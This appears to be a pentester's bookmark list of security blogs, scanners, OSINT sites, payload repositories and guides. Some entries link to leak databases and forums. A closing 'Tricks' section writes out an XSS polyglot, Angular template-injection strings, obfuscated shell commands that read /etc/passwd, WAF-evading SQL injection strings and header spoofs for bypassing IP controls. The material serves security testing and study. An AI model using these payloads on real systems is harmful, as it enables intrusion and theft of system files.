Useful Links

05-01-2021

Blogs
https://thehackernews.com/
https://www.cisoadvisor.com.br/
https://threatpost.com/
https://cgreinhold.dev/
https://snyk.io/blog/
https://www.troyhunt.com/
https://samy.pl/
https://www.malwaretech.com/
https://minutodaseguranca.blog.br/
https://www.welivesecurity.com
https://secnhack.in/
https://www.syhunt.com/pt/?n=News.2021-Leaks&key=lucy17 (Leaks Feed)

YouTubers
https://youtube.com/LiveOverflowCTF
https://youtube.com/c/DavidBombal/
https://youtube.com/c/JohnHammond010/
https://youtube.com/stokfredrik
https://youtube.com/c/GabrielPato/

GitHub profiles
https://github.com/carlospolop
https://github.com/KingOfBugbounty
https://github.com/helviojunior
https://github.com/VitorOriel

Web Scanners
https://gf.dev/toolbox/ (Swiss army knife for web environments)
https://www.ssllabs.com/ssltest/ (Various checks for web systems)
https://hstspreload.org/ (Simple and direct HSTS test)
https://observatory.mozilla.org/ (Various checks for web systems)
https://securityheaders.com/ (Checks focused on the required HTTP headers)
https://www.securityscore.com.br/ (Scan that goes beyond the web system; checks e-mail and ports associated with the domain)
https://spyse.com/ (Scanner of the site's public information, crawler, JS and CSS URLs)

Passwords
https://haveibeenpwned.com/ (Check for password leaks)
https://spycloud.com (Checks the leaks associated with your account, including the exposed passwords)
https://intelx.io/ (Query a database of leaks)
http://pwndb2am4tzkvold.onion/ (Query a leak database)
http://xjypo5vzgmo7jca6b322dnqbsdnp3amd24ybx26x5nxbusccjkm4pwid.onion (Query a leak database)
https://raidforums.com (Forum where leaks are exposed)

OSINT
https://search.censys.io/ (IP and port scan)
https://www.shodan.io/ (IP and port scan)
https://wigle.net/ (Worldwide map of Wi-Fi networks)
https://www.exploit-db.com/google-hacking-database/ (Google dorking)
https://www.shhgit.com/ (Real-time monitoring of potentially sensitive information being committed to GitHub, GitLab and Bitbucket)
https://osintframework.com/ (Large index of OSINT tools for reconnaissance and pentesting)
https://netbootcamp.org/osinttools/ (Aggregator of domain and social reconnaissance tools)
https://community.riskiq.com/ (Scanner of public information; finds plenty of subdomains, and that is all the free account is good for)
http://securitytrails.com (Efficient for finding subdomains)
https://gf.dev/whois-hosting (Discover the IP addresses behind a site)

Web Tools
https://gchq.github.io/CyberChef/ (Swiss army knife. Various utilities: scrapers, extractors, etc.)
https://www.processlibrary.com/en/ (Search for DLLs and processes)
https://id-ransomware.malwarehunterteam.com/ (Identify ransomware)
https://caniuse.com/ (Browser compatibility check)
https://grabify.link/ (Link shortener with IP logger)
https://archive.org/web/ (Wayback Machine - history of old pages)
https://beautifier.io/ (Turns minified JS into readable form)

Desktop Tools
https://beefproject.com/
http://sqlmap.org/
https://docs.microsoft.com/en-us/sysinternals/ (Swiss army knife of environment analysis tools)
https://pentestbox.org/pt/ (Many tools in a sandbox without needing to spin up a VM)
https://github.com/globocom/huskyCI (Tool made by Globo. Orchestrator for repository code analysis, meant to run alongside a CI)
https://github.com/Genymobile/scrcpy (Solution for mirroring a phone's screen to the computer)
https://www.postman.com/ (Builds HTTP requests on demand)
https://dbeaver.io/ (Universal database client)
https://nordvpn.com/ (VPN for secure communication - paid)
https://github.com/assetnote/kiterunner (Endpoint spider)
https://github.com/KingOfBugbounty/SecretFinder (Searches HTML or JS files for possible keys)
https://github.com/lirantal/is-website-vulnerable (Open-source alternative for auditing the front-end technologies of a web system, with clear, objective results pointing out the problems)
https://github.com/projectdiscovery/nuclei
https://github.com/skavngr/rapidscan (multi-tool web vulnerability scanner)
https://github.com/NESCAU-UFLA/FuzzingTool

Browser plugins
KeyFinder
Web scan

Pentest (DAST)
https://www.zaproxy.org/ (scripts link)
https://subgraph.com/vega/
https://github.com/1N3/Sn1per/
https://owasp.org/www-community/Vulnerability_Scanning_Tools (List of many paid and free tools)
https://start.me/p/BnBb5v/jornadas-osint (Gathers many OSINT links: nickname, image and people search engines, etc.)

Traffic analyzers
https://portswigger.net/burp/
https://www.charlesproxy.com/
https://www.telerik.com/fiddler
https://www.wireshark.org/

Lists
https://github.com/danielmiessler/SecLists (Payloads)
https://github.com/swisskyrepo/PayloadsAllTheThings (Payloads for almost everything)
https://github.com/sindresorhus/awesome#security (Index of materials for pentesting, recon, etc.)
https://github.com/carpedm20/awesome-hacking#readme (Index of materials for pentesting, recon, etc.)
https://github.com/qazbnm456/awesome-web-security#readme (Index of materials for pentesting, recon, etc.)
https://github.com/sbilly/awesome-security#web (Index of materials for pentesting, recon, etc.)
https://www.routerpasswords.com/ (List of default device passwords)
https://minutodaseguranca.blog.br/lista-completa-de-ferramentas-de-teste-de-penetracao-e-hacking/
https://github.com/nixawk/pentest-wiki (Index and guide for recon and pentests)

About API keys
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/API%20Key%20Leaks
https://community.turgensec.com/finding-hidden-api-keys-how-to-use-them/

About AWS buckets
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/AWS%20Amazon%20Bucket%20S3

Cryptography, hash databases and crackers
https://hashdecryption.com/
https://emn178.github.io/online-tools/
https://hashtoolkit.com/
https://www.perturb.org/content/hashes/
http://hashmash.info/
https://md5hashing.net/
https://sha1.gromweb.com/
https://www.boxentriq.com/code-breaking/cipher-identifier/ (Analyzer that guesses the type of cipher used)
https://www.openwall.com/john/ (John the Ripper password cracker)
https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm (Database for download)
https://hstrike.com/ (Some tools for analyzing ciphers and passwords)

Application for validating web scanners
http://public-firing-range.appspot.com/

Databases for checking library vulnerabilities
https://snyk.io/vuln
https://ossindex.sonatype.org/
https://cve.mitre.org/cve/search_cve_list.html
https://www.nuget.org/packages/Audit.NET/ (Visual Studio extension)

DNS checks
https://toolbox.googleapps.com/apps/dig/
https://dnslytics.com/
https://mxtoolbox.com/

Mind maps, diagrams and prototyping
https://www.mindmeister.com/
https://miro.com/app/

File and text sharing
https://gofile.io/
https://pastebin.com/
http://dontpad.com/

HTTPS certificate issuance at low or no cost
https://letsencrypt.org/

CORS bypass
https://cors-anywhere.herokuapp.com/

Reverse Tabnabbing
https://security.christmas/2019/12
https://owasp.org/www-community/attacks/Reverse_Tabnabbing
https://github.com/OWASP/www-community/blob/master/pages/attacks/Reverse_Tabnabbing.md

CSP
https://cspscanner.com/ (Simple CSP test)
https://csper.io/evaluator (CSP evaluator)
https://csper.io/generator/ (CSP generator)
https://developer.mozilla.org/pt-BR/docs/Web/HTTP/CSP
https://owasp.org/www-community/attacks/Content_Security_Policy

Lax vs Strict
https://blog.benpri.me/blog/2019/05/13/samesite-cookies-in-practice/

XSS Game
https://xss-game.appspot.com

I Know What You Download
https://iknowwhatyoudownload.com/en/peer/

Sonar's development best-practice rules
https://rules.sonarsource.com/csharp

Cheat sheets and prevention

General - OWASP cheatsheetseries link
XSS - Portswigger XSS cheatsheet link
XSS - OWASP XSS cheatsheet link
DOM XSS - OWASP DOM XSS cheatsheet link
XSS - XSS payloads beyond alert link
XSS - PayloadsAllTheThings payloads link
Markdown XSS - https://github.com/cujanovic/Markdown-XSS-Payloads/blob/master/Markdown-XSS-Payloads.txt
SQLi - Portswigger SQLi cheatsheet link
SQLi - Netsparker SQLi cheatsheet link
Privilege Escalation - https://github.com/Ignitetechnologies/Privilege-Escalation/
Burp - https://github.com/Ignitetechnologies/BurpSuite-For-Pentester

Angular template injection

.Net
https://github.com/pwntester/ysoserial.net (Exploit unsafe .NET object deserialization)

Calculate vulnerability severity
https://www.first.org/cvss/calculator/3.0
https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator

Collection of pentest reports
https://github.com/juliocesarfort/public-pentesting-reports

Events
https://bekk.christmas/
https://security.christmas/
https://tryhackme.com/room/25daysofchristmas

Security Awareness

Personal Security Checklist
https://github.com/Lissy93/personal-security-checklist

Password vault
https://bitwarden.com/

Google's phishing quiz
https://phishingquiz.withgoogle.com/

Security criteria in code
https://security-code-scan.github.io/

Guides

CTO Security Checklist/Guide
https://www.goldfiglabs.com/guide/saas-cto-security-checklist/

Bugbounty Tips
https://github.com/KingOfBugbounty/KingOfBugBountyTips

File signature verification
https://www.garykessler.net/library/file_sigs.html

Books
https://book.hacktricks.xyz/
https://www.manning.com/books/api-security-in-action

4 things every report must have
https://rhinosecuritylabs.com/penetration-testing/four-things-every-penetration-test-report/

Focus on the important items of the guide, how and what to use
https://www.apriorit.com/dev-blog/622-qa-web-application-pen-testing-owasp-checklist

Security Design Guidelines for Web Services
https://msdn.microsoft.com/en-us/library/ff649737.aspx

About HSTS
https://www.troyhunt.com/understanding-http-strict-transport

12 tips against DDoS
https://blog.4linux.com.br/12-metodos-para-prevenir-ddos/

How to implement salting correctly
https://crackstation.net/hashing-security.htm

Tips for .NET programmers
https://cheatsheetseries.owasp.org/cheatsheets/DotNet_Security_Cheat_Sheet.html (Topic 'ASP NET Web Forms Guidance', on CSRF and ViewState)

Secure communication: Jitsi, Signal or Wire
https://thehackernews.com/2020/04/zoom-cybersecurity-hacking.html

For everything else that requires sharing sensitive information, there are more secure options like self-hosted Jitsi, Signal and Wire.

WCF: client tips
https://www.oreilly.com/library/view/programming-wcf-services/9781449382476/ch01s13.html

GC fundamentals
https://docs.microsoft.com/en-us/dotnet/standard/garbage-collection/fundamentals?redirectedfrom=MSDN#background_server_garbage_collection

Tricks

jQuery version:

alert(jQuery.fn.jquery);

XSS polyglot

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

Angular:

{{constructor.constructor('alert(1)')()}}
{{constructor.constructor('alert(/XSS Stored!/)')()}}
1023+1 or {{1023+1}}

Reading /etc/passwd file:

1) cat$IFS$9${PWD%%[a-z]*}e*c${PWD%%[a-z]*}p?ss??
2) ??n/??t$IFS/?tc/????wd
3) ??n${PATH%%[a-z]*}??t$IFS${PATH%%[a-z]*}??c${PATH%%u*}?????d

Explanation:
$'\x41' => 'A' (HEX)
$'\U41' => 'A' (HEX Unicode)
$'\101' => 'A' (Octal)

SQL Injection examples:

1+OR/AND+1=1 and sELeCt/*Test*/1 and so on.

/?id=1%27%20AND%20%271%27=LENGTH(%27;%27)%20--+
/?id=1%27%20AND%20%271%27=LENGTH(%27;;%27)%20--+

/?id=1%27%20AND%20%271%27=STRCMP(%22;%22,%20%22;%22);%20--+
/?id=1%27%20AND%20%271%27=STRCMP(%22;;%22,%20%22;%22);%20--+

/?id=1%27%20AND%20%271%27=(sELecT%20@LOL:=1)%20--+
/?id=1%27%20AND%20%271%27=(sELecT%20@LOL:=12)%20--+

WAF - IP-based control bypass

X-Originating-IP:localhost
X-Forwarded-For:localhost
X-Remote-IP:localhost
X-Remote-Addr:localhost
X-Forwarded-Host:localhost
X-Client-IP:localhost
X-Remote-IP:localhost
X-Remote-Addr:localhost
X-Host:localhost
True-Client-Ip:localhost

Insecure Deserialization

Payloads: https://github.com/pwntester/ysoserial.net
JSON insecure deserialization: https://medium.com/r3d-buck3t/insecure-deserialization-with-json-net-c70139af011a